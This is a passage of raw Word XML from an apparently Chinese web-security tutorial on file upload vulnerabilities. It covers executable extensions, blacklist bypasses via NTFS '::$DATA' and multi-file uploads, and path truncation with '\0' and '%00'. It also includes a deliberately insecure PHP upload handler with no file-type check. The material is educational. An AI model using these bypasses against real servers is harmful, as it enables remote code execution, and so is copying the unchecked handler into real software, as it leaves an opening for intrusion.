          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>php5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>phtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>ascx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>jspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>在某些情况下由于管理员错误的服务器配置（将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.html    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
          <w:sz w:val="21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</w:rPr>
        <w:t>后缀的文件使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360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417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="任意上传漏洞原理"/>
      <w:bookmarkStart w:id="47" w:name="_bookmark22"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>进行解析等）会导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>等静态页面后缀的文件也可被执</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="489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在上传文件保存磁盘为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NTFS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>格式时可通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>::$DATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4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绕过黑名单限制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有时服务器只对第一个被上传的文件进行了检查，这时通过同时上传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多个文件并将恶意文件掺杂</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进其中</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也可绕过服务器的过滤。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文件解析漏洞导致文件执行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当服务器上存在文件解析漏洞时，合法的文件名便可导致带有恶意代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码的文件被执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="71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sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件路径截断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在上传的文件中使用一些特殊的符号，使得文件被上传到服务器中时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路径被截断从而控制文件路径。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333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常用的进行文件路径截断的字符如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\0?%00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18"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>在可以控制文件路径的情况下，使用超长的文件路径也有可能会导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333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color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件路径截断。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1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="837" w:right="317" w:hanging="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>任意上</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传漏洞原理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由于文件上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传功能</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实现代码没有严格限制用户上传的文件后缀以</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="421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及文件类型，导致允许攻击者向</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>某个可</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>访问的目录</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上传任</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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意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文件，并能够将这些文件传递给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解释器，就可以在远程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="2" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="3263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服务器上执行任意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脚本。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任意文件上传漏洞实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317" w:firstLine="420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以下代码会处理上传的文件，并将它们移到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>根目录下的一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int="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目录中。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攻击者可以将任意的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>源文件上传到该程序中，并随后从服务器中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请求这些文件，会在远程服务器上执行恶意文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360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  <w:lang w:eastAsia="zh-CN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283" type="#_x0000_t202" style="width:319.25pt;height:162.05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isset($_POST["form"])){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="420" w:right="-9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$uploadfile = "upfiles/"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.$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_FILES['upfile']['name']; move_uploaded_file($_FILES['upfile']['tmp_name'], $uploadf</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="420" w:right="2510" w:hanging="420"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/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ile</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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);//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>没有检查文件类型就直接上传</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">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print_r($_FILES);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:ind w:left="483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die(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);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="63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spacing w:line="289" w:lineRule="exact"/>
        <w:ind w:left="417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即使程序将上传的文件存储在一个无法通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>访问的目录中，攻</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="415"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>击者仍然有可能通过向服务器环境引入恶意内容来发动其他攻击。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如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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>果程序</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>容易出现文件包含漏洞，那么攻击者就可能上传带恶意内容的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文件，并利用另一种漏洞促使程序读取或执行该文件，形成“二次攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>击”。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1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417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文件上传案例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317" w:firstLine="420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 xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件上传通常会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> move_uploaded_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，也可以找到文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件上传的程序进行具体分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317" w:firstLine="420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一套</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>应用程序，一般都会提供文件上传的功能，方便来访者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上传一些文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="345" w:lineRule="exact"/>
        <w:ind w:left="417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9282" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:19.3pt;width:319.25pt;height:126.05pt;z-index:4360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8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&lt;form action="upload.php" method="post" enctype="multipa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rt/form-data" name="form1"&gt;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&lt;input type="file" name="file1" /&gt;&lt;br /&gt;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&lt;input type="submit" value="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上传文件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"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/&gt;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&lt;input type="hidden" name="MAX_FILE_SIZE" value="1024" /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&gt;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&lt;/form&gt;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</w:rPr>
        <w:t>下面是一个简单的文件上传表单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="303" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="279"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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的配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> php.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，其中选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload_max_filesize </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>指定允许上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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传的文件大小，默认是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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56"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">$_FILES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>数组变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9281" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:38.05pt;width:319.25pt;height:216.15pt;z-index:4384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$FILES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Array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[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] =&gt; Array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before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="3037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[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name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] =&gt; test.txt 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文件名称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[type] =&gt;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text/plain //MIME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类型</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="1567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[tmp_name] =&gt; /tmp/php5D.tmp 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临时文件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[error] =&gt; 0 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错误信息</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342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[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size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] =&gt; 536 //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文件大小，单位字节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</w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>使用变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$_FILES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>来上传文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$_FILES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>是一个数组。如果上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
